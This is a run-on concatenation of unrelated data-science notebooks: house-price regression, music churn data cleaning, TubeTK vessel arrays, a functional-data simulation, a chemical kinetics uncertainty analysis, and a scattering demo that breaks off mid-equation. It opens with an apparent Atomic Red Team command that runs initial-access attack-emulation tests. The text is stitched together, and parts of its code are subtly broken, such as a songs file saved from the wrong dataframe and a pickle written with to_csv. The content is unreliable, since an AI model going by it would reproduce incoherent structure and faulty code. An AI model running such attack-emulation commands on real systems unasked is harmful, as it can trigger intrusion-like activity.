https://github.com/cyb3rbuff/ART-Utils/Invoke-AtomicTest-By Invoke-AtomicTest-By -Tactic initial-accessLoad numerical dataGenerated in notebook ``data_exploration_numerical_features.ipynb``dfnum_t2 = pd.read_csv('transformed_dataset_dfnum_t2.csv', index_col=['Dataset','Id']) dfnum_t2.head() dfnum_t2.tail()Recreate transformed (standardized) sale pricetarget = pd.read_csv('../data/train_target.csv') scaler = sk.preprocessing.StandardScaler() def standardize(df): _values = sk.preprocessing.StandardScaler().fit_transform(df) return pd.DataFrame(data=_values, columns=df.columns) def transform_target(target): logtarget = np.log1p(target / 1000) return scaler.fit_transform(logtarget) def inverse_transform_target(target_t): logtarget = scaler.inverse_transform(target_t) return np.expm1(logtarget) * 1000 target_t = transform_target(target) # Test assert all(target == inverse_transform_target(target_t))Ordinary Least Squares model with key featuresWe're left with 22 features. The first 4 should all be highly correlated with the price.data = dfnum_t2.loc['train',:].copy() data['SalePrice'] = target_t fig, axes = plt.subplots(2,2,figsize=(10,10)) for feature, ax in zip(key_features[:4], itertools.chain.from_iterable(axes)): ax.plot(data[feature], data['SalePrice'], 'o') ax.set(xlabel=feature, ylabel='SalePrice')Let's build a simple linear regression model based on these 4 features.regression1 = smapi.ols("SalePrice ~ OverallQual + GrLivArea + GarageCars + GarageArea", data=data).fit() regression1.summary()** R-squared equals 0.79 so it's pretty good for a first try. Let's see what happens if we include all our numerical features.**data.columnsStatsmodels gets confused with columns that start with a digit, so let's rename that column firstdata['1stFlrSF'].name = 'FlrSF' def rename_columns(df): return df.rename_axis({'1stFlrSF': 'FirstFlrSF', '2ndFlrSF': 'SndFlrSF'}, axis=1) data = rename_columns(data) data.columns desc = 'SalePrice ~ ' + ' + '.join(data.drop('SalePrice', axis=1)) descAs can be seen below, using more numerical values improves R-squared to 0.88 which is pretty good, though there's of course a risk of overfitting.regression2 = smapi.ols(desc, data=data).fit() regression2.summary()Cross validationdef get_data(X, y): df = X.copy() df['SalePrice'] = y return df def ols1(X, y): data = get_data(X, y) return smapi.ols("SalePrice ~ OverallQual + GrLivArea + GarageCars + GarageArea", data=data) def ols2(X, y): data = get_data(X, y) return smapi.ols(desc, data=data)Test the model Use `sklearn.model_selection.train_test_split` to run some experiments and validate the modelsdef rmse(prediction, exact): return np.mean((prediction - exact)**2.0)**0.5 def run_experiment(estimator, scoring=rmse): Xtrain, Xtest, ytrain, ytest = sk.model_selection.train_test_split(data.drop('SalePrice', axis=1), data['SalePrice']) model = estimator(Xtrain, ytrain).fit() return scoring(model.predict(Xtest), ytest) def cross_validate(estimator, cv=5): return np.array([run_experiment(estimator) for _ in range(cv)]) for model in [ols1, ols2]: errors = cross_validate(model) print(errors, errors.mean())Use `sklearn.model_selection_cross_val_score` to validate the modelsfor model in [ols1, ols2]: mse = np.sqrt(-sk.model_selection.cross_val_score(samlib.Regressor(model), data.drop('SalePrice', axis=1), y=data['SalePrice'], scoring='neg_mean_squared_error', cv=5)) print(mse, mse.mean())Make a submissiondfnum_t2 = rename_columns(dfnum_t2) submission_t = regression2.predict(dfnum_t2.loc['test',:])Scale the resultsubmission = inverse_transform_target(submission_t) submission def save(filename, submission): df = pd.DataFrame(data={ "Id": np.arange(len(submission)) + 1461, "SalePrice": submission }) df.to_csv(filename, index=False) save('ols_key_numerical_features_only.csv', submission)Data Cleansing and Wrangling -- and some insight for feature EDA and feature engineeringimport numpy as np import pandas as pd import matplotlib.pyplot as plt %matplotlib inline df_play_log = pd.read_csv('C:\\Users\\Sean\\Documents\\BitTiger\\Capston_music_player_python\\sampledata.csv',\ \ dtype = {'uid':'int', 'song_id':'str','date':'str'}) df_play_log.head() #dtype = {'uid':'int', 'song_id':'str','paid_flag':'str','date':'str'} df_play_log.isnull().sum(axis = 0)I. take care of missing values firstThe important columns for analysis are: date, play_time, and song_id, so drop the rows with missing values in these three fields.df_play_log = df_play_log.loc[df_play_log.file_name.notnull() & \ df_play_log.play_time.notnull() & \ df_play_log.song_id.notnull()] df_play_log.isnull().sum(axis = 0)Now assign int 0 to the missing values of song_type, which is the most populated song_typedf_play_log.loc[df_play_log.song_type.isnull(),'song_type'] = 0 df_play_log.isnull().sum(axis = 0) df_play_log.shape df_play_log = df_play_log.loc[df_play_log.song_name.notnull() | (df_play_log.song_length > 1)] df_play_log.isnull().sum(axis = 0) df_play_log.loc[df_play_log.song_name.isnull(),'song_name'] = \ df_play_log.loc[df_play_log.song_name.isnull(),'singer'] df_play_log.loc[df_play_log.song_name.isnull()] df_play_log = df_play_log.loc[df_play_log.song_name.notnull()] df_play_log.isnull().sum(axis = 0) df_play_log = df_play_log.reset_index() df_play_log.head(10)II. Column-by-column Data Wrangling 1. Datedf_play_log.groupby('date').size()There is an outlier date '0 ' in the data, which should be dropped from the data. Also, the string of dates all have a space ' ' as the first character, which should be removed.df_play_log = df_play_log.loc[df_play_log.date != '0 '] df_play_log.shape df_play_log.date[0] df_play_log.date[0].split()[0] df_play_log.date = df_play_log.date.apply(lambda x: x.split()[0]) df_play_log.groupby(['date','label']).size()2. Song typedf_play_log.song_type.unique() str(3.0).split('.')[0] df_play_log.song_type = df_play_log.song_type.apply(lambda x: str(x).split('.')[0]) df_play_log.groupby(['song_type','label']).size()3. uid uid == 0 is a weird user: many of its play_time can be even larger than the song_length drop uid==0df_play_log.song_length = pd.to_numeric(df_play_log.song_length) df_play_log[(df_play_log.song_length <1) & (df_play_log.uid == 0)] df_play_log = df_play_log[df_play_log.uid != 0] df_play_log.shape4. play_time play_time are strings. Some are has '>' in it. Split with '>' and keep only the part in front of '>'. Finally, change the type to floatdf_play_log['play_time'] = df_play_log['play_time'].apply(lambda x: x.split('>')[0]) df_play_log.play_time.value_counts() df_play_log.play_time = df_play_log.play_time.astype(float) df_play_log.loc[df_play_log.play_time == 0]The logs with play_time == 0 are just so populated, so keep the rows. 5. song_id song_id should be an integer or a string of numbers without decimal The corner case is where song_id == '0'. There are more than 500k logs with '0' as common song_id, but they are actually different songs: Some songs have '0' and another song_id Some songs only have '0' as song_id song_id imputation: 1) change the song_id to its most common values, if there is value other than '0' 2) if it doesn't have another song_id, create new song_ids. What is needed is a {(song_name, singer, song_type):song_id} dictionary.df_play_log.song_id = df_play_log.song_id.apply(lambda x: x.split('.')[0]) df_play_log.loc[df_play_log.song_id == '0'] df_play_log.groupby(['song_name','singer','song_type']).size().shape, \ df_play_log.groupby(['song_name','singer','song_type','song_id']).size().shapeAlthough the combination of ('song_name','singer','song_type') can identify a song without ambiguity, there ISN'T an one-to-one mapping from ('song_name','singer','song_type') to 'song_id'. Find out the duplicated 'song_id'ssong_id_groupby_object = df_play_log[['song_name','singer','song_type','song_id']].\ groupby(['song_name','singer','song_type']) combinations = [] song_id_groups = [] for i, group in enumerate(song_id_groupby_object): combinations.append(group[0]) song_id_groups.append(group[1]) len(combinations) go = 1 i = 10 while go: if list(set(song_id_groups[i].song_id))[0] != '0': i += 1 else: i += 1 go = 0 i song_id_groups[63] df_play_log.loc[song_id_groups[63].index,:] song_id_groups_dict[combinations[119999]] song_id_groups_dict = df_play_log[['song_name','singer','song_type','song_id']].\ groupby(['song_name','singer','song_type']).groups import time lap_start = time.clock() new_song_id_list = [] for i in xrange(len(combinations)): if (i >0) & (i%100 == 0): print 'processing %dth - %dth song; previous lap costed %.2f seconds\r' % (i,i+100, (time.clock()-lap_start)) lap_start = time.clock() # a song has a normal song_id and the abnormal '0' # assign all song_id to be the normal one if len(set(song_id_groups[i].song_id)) > 1: df_play_log.loc[song_id_groups[i].index,'song_id']=max(song_id_groups[i].song_id) new_song_id_list.append(max(song_id_groups[i].song_id)) # when there is only one song_id (all song_id are the same if multiple lines) # if song_id == '0' # assign the group index with 'g' leading: e.g. 'g2017'. elif list(set(song_id_groups[i].song_id))[0] == '0': df_play_log.loc[song_id_groups[i].index,'song_id'] = 'g'+str(i) new_song_id_list.append('g'+str(i)) # the rest all has normal song_id, no change in song_id else: new_song_id_list.append(list(set(song_id_groups[i].song_id))[0]) total_songs = len(new_song_id_list) total_songs k = 63 new_song_id_list[k],combinations[k] df_play_log.loc[df_play_log.song_id == new_song_id_list[63]] df_songs = pd.DataFrame({'song_id':new_song_id_list, 'song_name': [combinations[i][0] for i in xrange(total_songs)], 'singer':[combinations[i][1] for i in xrange(total_songs)], 'song_type':[combinations[i][2] for i in xrange(total_songs)]}) df_songs = df_songs.set_index('song_id') df_songs.head() # times of play also necessary df_songs['times_played'] = [song_id_groups[i].shape[0] for i in xrange(total_songs)] df_songs.head() df_songs.info() # get favorite songs info popular_songs = df_play_log['song_id'].value_counts()[:200].index popular_songs[100:110] # the rarely played songs are also worth examining. rarely_played = sum(df_play_log['song_id'].value_counts()<2) rarely_played rarely_played_songs = df_play_log.song_id.value_counts()[-1:-rarely_played-1:-1].index len(rarely_played_songs) # searching play log of a certain rare song df_play_log.loc[df_play_log.song_id == rarely_played_songs[0]] df_songs.loc[df_songs.index == rarely_played_songs[0]]reduce the size of the original df_play_log In the following analysis, the detailed information can be ommitted from the df_play_log, while the only information left is song_iddf_play_log = df_play_log.drop(['song_name','singer','paid_flag'],axis = 1) df_play_log.head()Save current data framesfilename = 'C:\\Users\\Sean\\Documents\\BitTiger\\Capston_music_player_python\\reduced_play_log.csv' df_play_log.to_csv(filename,sep = '\t', mode = 'a', encoding = 'utf-8') # also save into .pickle filename_pickle = 'C:\\Users\\Sean\\Documents\\BitTiger\\Capston_music_player_python\\reduced_play_log.pkl' df_play_log.to_pickle(filename_pickle) # songs song_file = 'C:\\Users\\Sean\\Documents\\BitTiger\\Capston_music_player_python\\songs.csv' df_play_log.to_csv(song_file,sep = '\t', mode = 'a', encoding = 'utf-8') song_file_pickle = 'C:\\Users\\Sean\\Documents\\BitTiger\\Capston_music_player_python\\songs.pkl' df_play_log.to_csv(song_file_pickle) total_counts_series = df_play_log.groupby('uid').size() total_counts_series.index abnormal_uid = total_counts_series.index[total_counts_series>6600] abnormal_uid df_play_log.uid.value_counts()III. Feature creation: primary features based on the play log Two features to create: 1. rare_song_player (taking 0,1), and 2. song_popular_ratiorare_song_player_id = df_play_log.loc[df_play_log.song_id.isin(rarely_played_songs),'uid'] df_play_log['is_popular'] = df_play_log.song_id.isin(popular_songs) df_play_log.head() df_play_log[['uid','is_popular']].groupby('uid').mean() df = pd.DataFrame(columns= ['uid','device','major_song_type','total_play_time']) df.uid = df_play_log.groupby(['uid']).size().index df df['popular_songs_ratio'] = list(df_play_log[['uid','is_popular']].groupby('uid').mean()['is_popular']) df.head() #majority vote of device df.device = list(df_play_log.groupby('uid')['device'].apply(lambda x: x.value_counts().index[0])) df.head() df.device.value_counts() #majority vote of song_type df.major_song_type = list(df_play_log.groupby('uid')['song_type'].apply(lambda x: x.value_counts().index[0])) df.head() df.major_song_type.value_counts() df.total_play_time = list(df_play_log.groupby('uid')['play_time'].sum()/60) # change time unit to minutes sum(df.total_play_time>100000) bins = [-1,100,200,300,400,500,600,700,800,900,1000,2000,3000,4000,5000,6000,7000,8000,9000,10000,float('inf')] bin_names = ['0-100','100-200','200-300','300-400','400-500','500-600','600-700','700-800','800-900','900-1k',\ '1k-2k','2k-3k','3k-4k','4k-5k','5k-6k','6k-7k','7k-8k','8k-9k','9k-10k','10k+'] play_time_label = pd.cut(df.total_play_time,bins, labels = bin_names) play_time_label.value_counts() df.groupby(play_time_label).mean()['label']Obviously, when accumulated play time is between 1000 and 9000 minutes, the user is unlikely to churn( churn rate < 0.25)df['play_time_label'] = play_time_label df.head() df_mean = df_play_log.groupby('uid').mean() df_mean df_mean.label = df_mean.label.astype(int) df_mean.label.value_counts() df['avg_play_time'] = list(df_mean.play_time) df['label']=list(df_mean.label) df.head() df.groupby(['play_time_label','label']).size().unstack() # number of most frequently played songs sum(df_play_log.groupby('song_id').size()>1000) popular_songs = df_play_log['song_id'].value_counts()[:674].index df_play_log['is_popular'] = df_play_log.song_id.isin(set(popular_songs)) df_play_log.head() # number of least frequently played songs num_least_pop = sum(df_play_log.groupby('song_id').size()<=1) num_least_pop least_popular_songs = df_play_log['song_id'].value_counts()[-1:-num_least_pop-1:-1].index df_play_log['least_popular'] = df_play_log.song_id.isin(set(least_popular_songs)) df_play_log.head() df['total_play_count'] = list(df_play_log.groupby('uid').size()) df['least_popular_count'] = list(df_play_log.groupby('uid').sum()['least_popular']) df.head() df['least_popular_ratio'] = df.apply(lambda x: x.least_popular_count/x.total_play_count, axis = 1) df.head() df.groupby(pd.cut(df.least_popular_ratio, np.percentile(df.least_popular_ratio, [0, 44.3, 100]), \ include_lowest=True))\ .mean()['label'] # The users who has played the rare songs are less likely to churn:Examine the cutoff for labeling popular songs: 500,1000,2000popular_songs_cutoff = [500,1000,2000] cutoff_quantile_dict = {} for i in range(len(popular_songs_cutoff)): print 'procesing no.%d cutoff: %d' % (i,popular_songs_cutoff[i]) num_pop_songs = sum(df_play_log.groupby('song_id').size()>popular_songs_cutoff[i]) popular_songs = df_play_log['song_id'].value_counts()[:(num_pop_songs-1)].index df_play_log['is_popular'] = df_play_log.song_id.isin(set(popular_songs)) df_temp = df_play_log.groupby('uid').mean() cutoff_quantile_dict[i] = df_temp.groupby(pd.cut(df_temp.is_popular, \ np.percentile(df_temp.is_popular, [0, 25,50,75, 100]),include_lowest = True)).mean()['label'] cutoff_quantile_dict pd.DataFrame({popular_songs_cutoff[0]:list(cutoff_quantile_dict[0]), popular_songs_cutoff[1]:list(cutoff_quantile_dict[1]), popular_songs_cutoff[2]:list(cutoff_quantile_dict[2])})The different cutoffs give similar results: When the user does play popular songs a lot( pop ratio in the >75% quantile among all users), the churn rate will be much higher. The fact, that the 3rd quantile value changes monotonically with the cutoff value for the popular songs, suggests the absolute value of the times playing popular songs, instead of the percentage of pop songs in one's play activity, is the more direct factor to predict churns.df_temp = df_play_log.groupby('uid').sum() df_temp.label = df_temp.label.apply(lambda x: x>0) df_temp.groupby(pd.cut(df_temp.is_popular, \ np.percentile(df_temp.is_popular, [0, 25,75, 100]),include_lowest = True)).mean()['label']Choosing 2000 as the cutoff time of plays for popular songs. Then, the 25% and 75% quantiles of users' popular song values, 5 and 50 can differentiate the users significantly. When n < 5, churn possibility is high. When n > 50, churn possibility is low. What about the other cutoff values?# cutoff value is 500 popular_song_cutoff = 500 popular_songs_num = sum(df_play_log.groupby('song_id').size() > popular_song_cutoff) popular_songs = df_play_log['song_id'].value_counts()[:(popular_songs_num-1)].index df_play_log['is_popular'] = df_play_log.song_id.isin(set(popular_songs))25%, 75% quantile cutoffs are 17 and 107 for defining popular songs as played more than 500 times.df_temp = df_play_log.groupby('uid').sum() df_temp.label = df_temp.label.apply(lambda x: int(x>0)) df_temp.groupby(pd.cut(df_temp.is_popular, \ np.percentile(df_temp.is_popular, [0, 25,75, 100]),include_lowest = True)).mean()['label'] df_temp.head() df['most_popular_count'] = list(df_play_log.groupby('uid').sum()['is_popular']) df.head()Examine the count of plays in different time windowdf_daily_count = df_play_log.groupby(['uid','date']).size().unstack().fillna(0) df_daily_count.head() days = df_daily_count.shape[1] days df['count_play_1'] = list(df_daily_count.iloc[:,(days-1)]) df.head() for i in [3,7,14,23]: colname = 'count_play_'+str(i) df[colname] = list(df_daily_count.iloc[:,(days-i):days].sum(axis = 1)) df.head() df.shape labels = list(df['label']) df = df.drop(['label','least_popular_ratio','total_play_count'],axis = 1) df.head() df['label'] = labels df.label = df.label.astype(int) df.head() df.shape df.loc[df.uid.isin(abnormal_uid)] filename_pickle = 'C:\\Users\\Sean\\Documents\\BitTiger\\Capston_music_player_python\\features_and_label.pkl' df.to_pickle(filename_pickle) test = pd.read_pickle(filename_pickle) test.shape test.head()This notebook illustrates the [TubeTK](http://tubetk.org) tube NumPy array data structure and how to create histograms of the properties of a [VesselTube](https://www.itk.org/Doxygen/html/classitk_1_1VesselTubeSpatialObject.html).First, import the function for reading a tube file in as a NumPy array, and read in the file.import os import sys from itk import tubes_from_file tubes = tubes_from_file("data/Normal071-VascularNetwork.tre")The result is a [NumPy Record Array](https://docs.scipy.org/doc/numpy/user/basics.rec.html) where the fields of the array correspond to the properties of a [VesselTubeSpatialObjectPoint](https://www.itk.org/Doxygen/html/classitk_1_1VesselTubeSpatialObjectPoint.html).print(type(tubes)) print(tubes.dtype) [('Id', 'The length of the array corresponds to the number of points that make up the tubes.print(len(tubes)) print(tubes.shape)106061 (106061,)Individual points can be sliced, or views can be created on individual fields.print('Entire points 0, 2:') print(tubes[:4:2]) print('\nPosition of points 0, 2') print(tubes['PositionInWorldSpace'][:4:2])Entire points 0, 2: [(-1, [121.26599451, 94.40424276, 0.30700558], [1., 0., 0., 1.], [0.82861531, 0.52673039, 0.18960951], [ 0.55138761, -0.70933917, -0.43910095], [ 0.09679036, -0.46839411, 0.87820191], 1.277065, 0., 0., 0., 0., 0., 0.) (-1, [121.33222107, 94.44634136, 0.32216 ], [1., 0., 0., 1.], [0.85344853, 0.48634417, 0.18733647], [-0.50062039, 0.86495203, 0.03517395], [ 0.14493042, 0.12380361, -0.98166585], 1.277065, 0., 0., 0., 0., 0., 0.)] Position of points 0, 2 [[121.26599451 94.40424276 0.30700558] [121.33222107 94.44634136 0.32216 ]]We can easily create a histogram of the radii or visualize the point positions.%pylab inline from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt fig = plt.figure(figsize=(16, 6)) ax = fig.add_subplot(1, 2, 1) ax.hist(tubes['RadiusInWorldSpace'], bins=100) ax.set_xlabel('Radius') ax.set_ylabel('Count') ax = fig.add_subplot(1, 2, 2, projection='3d') subsample = 100 position = tubes['PositionInWorldSpace'][::subsample] radius = tubes['RadiusInWorldSpace'][::subsample] ax.scatter(position[:,0], position[:,1], position[:,2], s=(2*radius)**2) ax.set_title('Point Positions') ax.set_xlabel('X') ax.set_ylabel('Y') ax.set_zlabel('Z');Populating the interactive namespace from numpy and matplotlibGeneration of the data# Load packages import numpy as np import pickle from FDApy.representation.simulation import Brownian from FDApy.representation.functional_data import DenseFunctionalData from FDApy.representation.functional_data import MultivariateFunctionalData # Define parameters of the simulation N1, N2, N3, N4, N5 = 200, 200, 200, 200, 200 M = 101 hurst1, hurst2 = 0.9, 0.8 x = np.linspace(1, 21, M) labels = np.repeat([0, 1, 2, 3, 4], repeats=(N1, N2, N3, N4, N5)) # Define mean functions def h(x, a): return 6 - np.abs(x - a) h_1 = lambda x: h(x, 7) / 4 if h(x, 7) > 0 else 0 h_2 = lambda x: h(x, 15) / 4 if h(x, 15) > 0 else 0 h_3 = lambda x: h(x, 11) / 4 if h(x, 11) > 0 else 0 # Simulation one scenario A = np.zeros((N1 + N2 + N3 + N4 + N5, M)) B = np.zeros((N1 + N2 + N3 + N4 + N5, M)) for idx in range(N1 + N2 + N3 + N4 + N5): h1 = np.array([h_1(i) for i in x]) h2 = np.array([h_2(i) for i in x]) h3 = np.array([h_3(i) for i in x]) brownian = Brownian(name='fractional') brownian.new(1, argvals=np.linspace(0, 2, 2 * M), hurst=hurst1) rand_part1 = brownian.data.values[0, M:] / (1 + np.linspace(0, 1, M)) ** hurst1 brownian = Brownian(name='fractional') brownian.new(1, argvals=np.linspace(0, 2, 2 * M), hurst=hurst2) rand_part2 = brownian.data.values[0, M:] / (1 + np.linspace(0, 1, M)) ** hurst2 eps = np.random.normal(0, np.sqrt(0.5), size=M) if idx < N1: A[idx, :] = h1 + rand_part1 + eps B[idx, :] = h3 + 1.5 * rand_part2 + eps elif N1 <= idx < N1 + N2: A[idx, :] = h2 + rand_part1 + eps B[idx, :] = h3 + 0.8 * rand_part2 + eps elif N1 + N2 <= idx < N1 + N2 + N3: A[idx, :] = h1 + rand_part1 + eps B[idx, :] = h3 + 0.2 * rand_part2 + eps elif N1 + N2 + N3 <= idx < N1 + N2 + N3 + N4: A[idx, :] = h2 + 0.1 * rand_part1 + eps B[idx, :] = h2 + 0.2 * rand_part2 + eps else: A[idx, :] = h3 + rand_part1 + eps B[idx, :] = h1 + 0.2 * rand_part2 + eps # Create functional data object data_1 = DenseFunctionalData({'input_dim_0': np.linspace(0, 1, M)}, A) data_2 = DenseFunctionalData({'input_dim_0': np.linspace(0, 1, M)}, B) data_fd = MultivariateFunctionalData([data_1, data_2])Smooth the data# Smooth the data data_1_smooth = data_1.smooth(points=0.5, neighborhood=6) data_2_smooth = data_2.smooth(points=0.5, neighborhood=6) data_fd_smooth = MultivariateFunctionalData([data_1_smooth, data_2_smooth]) # Save the data with open('./data/scenario_2.pkl', 'wb') as f: pickle.dump(data_fd, f) with open('./data/scenario_2_smooth.pkl', 'wb') as f: pickle.dump(data_fd_smooth, f) with open('./data/labels.pkl', 'wb') as f: pickle.dump(labels, f) # Save as CSV for R methods np.savetxt('./data/scenario_2_A.csv', A, delimiter=',') np.savetxt('./data/scenario_2_B.csv', B, delimiter=',') np.savetxt('./data/scenario_2_A_smooth.csv', data_1_smooth.values, delimiter=',') np.savetxt('./data/scenario_2_B_smooth.csv', data_2_smooth.values, delimiter=',') np.savetxt('./data/labels.csv', labels, delimiter=',')First Order Local Uncertainty Analysis for Chemical Reaction SystemsThis ipython notebook performs first order local uncertainty analysis for a chemical reaction systemusing a RMG-generated model.from rmgpy.tools.uncertainty import Uncertainty from rmgpy.tools.canteraModel import getRMGSpeciesFromUserSpecies from rmgpy.species import Species from IPython.display import display, Image import os # Define the CHEMKIN and Dictionary file paths. This is a reduced phenyldodecane (PDD) model. # Must use annotated chemkin file chemkinFile = 'uncertainty/chem_annotated.inp' dictFile = 'uncertainty/species_dictionary.txt' # Alternatively, unhighlight the following lines and comment out the lines above to use the minimal model, # which will not take as long to process # Make sure to also uncomment the specified lines two code blocks down which are related # chemkinFile = 'data/minimal_model/chem_annotated.inp' # dictFile = 'data/minimal_model/species_dictionary.txt'Initialize the `Uncertainty` class object with the model.uncertainty = Uncertainty(outputDirectory='uncertainty') uncertainty.loadModel(chemkinFile, dictFile)We can now perform stand-alone sensitivity analysis.# Map the species to the objects within the Uncertainty class PDD = Species().fromSMILES("CCCCCCCCCCCCc1ccccc1") C11ene=Species().fromSMILES("CCCCCCCCCC=C") ETHBENZ=Species().fromSMILES("CCc1ccccc1") mapping = getRMGSpeciesFromUserSpecies([PDD,C11ene,ETHBENZ], uncertainty.speciesList) initialMoleFractions = {mapping[PDD]: 1.0} T = (623,'K') P = (350,'bar') terminationTime = (72, 'h') sensitiveSpecies=[mapping[PDD], mapping[C11ene]] # If you used the minimal model, uncomment the following lines and comment out the lines above # ethane = Species().fromSMILES('CC') # C2H4 = Species().fromSMILES('C=C') # Ar = Species().fromSMILES('[Ar]') # mapping = getRMGSpeciesFromUserSpecies([ethane, C2H4, Ar], uncertainty.speciesList) # # Define the reaction conditions # initialMoleFractions = {mapping[ethane]: 1.0, mapping[Ar]:50.0} # T = (1300,'K') # P = (1,'atm') # terminationTime = (5e-4, 's') # sensitiveSpecies=[mapping[ethane], mapping[C2H4]] # Perform the sensitivity analysis uncertainty.sensitivityAnalysis(initialMoleFractions, sensitiveSpecies, T, P, terminationTime, number=5, fileformat='.png') # Show the sensitivity plots for species in sensitiveSpecies: print '{}: Reaction Sensitivities'.format(species) index = species.index display(Image(filename=os.path.join(uncertainty.outputDirectory,'solver','sensitivity_1_SPC_{}_reactions.png'.format(index)))) print '{}: Thermo Sensitivities'.format(species) display(Image(filename=os.path.join(uncertainty.outputDirectory,'solver','sensitivity_1_SPC_{}_thermo.png'.format(index))))If we want to run local uncertainty analysis, we must assign all the uncertainties using the `Uncertainty` class' `assignParameterUncertainties` function. `ThermoParameterUncertainty` and `KineticParameterUncertainty` classes may be customized and passed into this function if non-default constants for constructing the uncertainties are desired. This must be done after the parameter sources are properly extracted from the model. Thermo UncertaintyEach species is assigned a uniform uncertainty distribution in free energy:$G \in [G_{min},G_{max}]$$dG = (G_{max} - G_{min})/2$Several parameters are used to formulate $dG$. These are $dG_{library}$, $dG_{QM}$, $dG_{GAV}$, and $dG_{group}$. $dG = \delta_{library} dG_{library} + \delta_{QM} dG_{QM} +\delta_{GAV} dG_{GAV} +\sum_{group} w_{group} dG_{group}$where $\delta$ is a dirac delta function which equals one if the species thermochemistry parameter contains the particular source type and $w_{group}$ is the weight of the thermo group used to construct the species thermochemistry in the group additivity method. Kinetics UncertaintyEach reaction is assigned a uniform uncertainty distribution in the overall ln(k), or ln(A):$d \ln (k) \in [\ln(k_{min}),\ln(k_{max})]$$d\ln(k) = [\ln(k_{max})-\ln(k_{min})]/2$The parameters used to formulate $d \ln(k)$ are $d\ln(k_{library})$, $d\ln(k_{training})$, $d\ln(k_{pdep})$, $d\ln(k_{family})$, $d\ln(k_{non-exact})$, and $d\ln(k_{rule})$.For library, training, and pdep reactions, the kinetic uncertainty is assigned according to their uncertainty type. For kinetics estimated using RMG's rate rules, the following formula is used to calculate the uncertainty:$d \ln (k) = d\ln(k_{family}) + \log_{10}(N+1)*dln(k_{non-exact})+\sum_{rule} w_{rule} d \ln(k_{rule})$where N is the total number of rate rules used and $w_{rule}$ is the weight of the rate rule used to estimate the kinetics.uncertainty.loadDatabase() uncertainty.extractSourcesFromModel() uncertainty.assignParameterUncertainties()The first order local uncertainty, or variance $(d\ln c_i)^2$, for the concentration of species $i$ is defined as:$(d\ln c_i)^2 = \sum_j \left(\frac{d\ln c_i}{d\ln k_j}d\ln k_j\right)^2 + \sum_k \left(\frac{d\ln c_i}{dG_k}dG_k\right)^2$We have previously performed the sensitivity analysis. Now we perform the local uncertainty analysis and apply the formula above using the parameter uncertainties and plot the results. This first analysis considers the parameters to be independent. In other words, even when multiple species thermochemistries depend on a single thermo group or multiple reaction rate coefficients depend on a particular rate rule, each value is considered independent of each other. This typically results in a much larger uncertainty value than in reality due to cancellation error.uncertainty.localAnalysis(sensitiveSpecies, correlated=False, number=5, fileformat='.png') # Show the uncertainty plots for species in sensitiveSpecies: print '{}: Thermo Uncertainty Contributions'.format(species) display(Image(filename=os.path.join(uncertainty.outputDirectory,'thermoLocalUncertainty_{}.png'.format(species.toChemkin())))) print '{}: Reaction Uncertainty Contributions'.format(species) display(Image(filename=os.path.join(uncertainty.outputDirectory,'kineticsLocalUncertainty_{}.png'.format(species.toChemkin()))))Correlated UncertaintyA more accurate picture of the uncertainty in mechanism estimated using groups and rate rules requires accounting of the correlated errors resulting from using the same groups in multiple parameters. This requires us to track the original sources: the groups and the rate rules, which constitute each parameter. These errors may cancel in the final uncertainty calculation. Note, however, that the error stemming from the estimation method itself do not cancel. For thermochemistry, the error terms described previously are $dG_{library}$, $dG_{QM}$, $dG_{GAV}$, and $dG_{group}$. Of these, $dG_{GAV}$ is an uncorrelated independent residual error, whereas the other terms are correlated. Noting this distinction, we can re-categorize and index these two types of parameters in terms of correlated sources $dG_{corr,y}$ and uncorrelated sources $dG_{res,z}$.For kinetics, the error terms described perviously are $d\ln(k_{library})$, $d\ln(k_{training})$, $d\ln(k_{pdep})$, $d\ln(k_{family})$, $d\ln(k_{non-exact})$, and $d\ln(k_{rule})$. Of these, $d\ln(k_{family})$, $d\ln(k_{non-exact})$ are uncorrelated independent error terms resulting from the method of estimation. Again, we re-categorize the correlated versus non-correlated sources as $d\ln k_{corr,v}$ and $d\ln k_{res,w}$, respectively. The first order local uncertainty, or variance $(d\ln c_{corr,i})^2$, for the concentration of species $i$ becomes:$(d\ln c_{corr,i})^2 = \sum_v \left(\frac{d\ln c_i}{d\ln k_{corr,v}}d\ln k_{corr,v}\right)^2 + \sum_w \left(\frac{d\ln c_i}{d\ln k_{res,w}}d\ln k_{res,w}\right)^2 + \sum_y \left(\frac{d\ln c_i}{dG_{corr,y}}dG_{corr,y}\right)^2 + \sum_z \left(\frac{d\ln c_i}{dG_{res,z}}dG_{res,z}\right)^2$where the differential terms can be computed as:$\frac{d\ln c_i}{d\ln k_{corr,v}} = \sum_j \frac{d\ln c_i}{d\ln k_j}\frac{d\ln k_j}{d\ln k_{corr,v}}$$\frac{d\ln c_i}{d G_{corr,y}} = \sum_k \frac{d\ln c_i}{dG_k}\frac{dG_k}{dG_{corr,y}}$uncertainty.assignParameterUncertainties(correlated=True) uncertainty.localAnalysis(sensitiveSpecies, correlated=True, number=10, fileformat='.png') # Show the uncertainty plots for species in sensitiveSpecies: print '{}: Thermo Uncertainty Contributions'.format(species) display(Image(filename=os.path.join(uncertainty.outputDirectory,'thermoLocalUncertainty_{}.png'.format(species.toChemkin())))) print '{}: Reaction Uncertainty Contributions'.format(species) display(Image(filename=os.path.join(uncertainty.outputDirectory,'kineticsLocalUncertainty_{}.png'.format(species.toChemkin()))))Scattering of a plane wave by a hexagonThis is a script for computing the scattering of a plane wave by a penetrable hexagon using the 2D DDA version of the volume integral equation method. It is similar to the first demo, for the circle, but in addition shows how to:* compute the field in a larger domain than the computation domain* compute the far-field pattern* compute the far-field pattern for the scatterer in random orientation# Import packages import os import sys # FIXME: avoid this sys.path stuff sys.path.append(os.path.join(os.path.abspath(''), '../../')) import numpy as np from scipy.sparse.linalg import LinearOperator, gmres import time from vines.geometry.geometry import shape_2d, generatedomain2d from vines.operators.acoustic_operators import get_operator_2d, circulant_embedding from vines.fields.plane_wave import PlaneWave_2d from vines.operators.acoustic_matvecs import mvp_2d from vines.precondition.circulant_acoustic import mvp_circ_2d, circulant_preconditionerIntroduction to the volume integral equation methodThe boundary value problem we wish to solve is:Given a complex refractive index $\mu(x)\in\mathbb{C}$, incident wave $u^{\text{inc}}$ and wavenumber $k\in\mathbb{R}$, find the scattered field $u^{\text{sca}}$ such that$$ (\nabla^2 + (\mu(x) k)^2)u^{\text{sca}}(x) = -(\nabla^2 + (\mu(x) k)^2)u^{\text{inc}}(x).$$The incident wave satisfies the Helmholtz equation with the wavenumber $k$, so the right-hand side can be simplified to yield$$ (\nabla^2 + (\mu(x) k)^2)u^{\text{sca}}(x) = 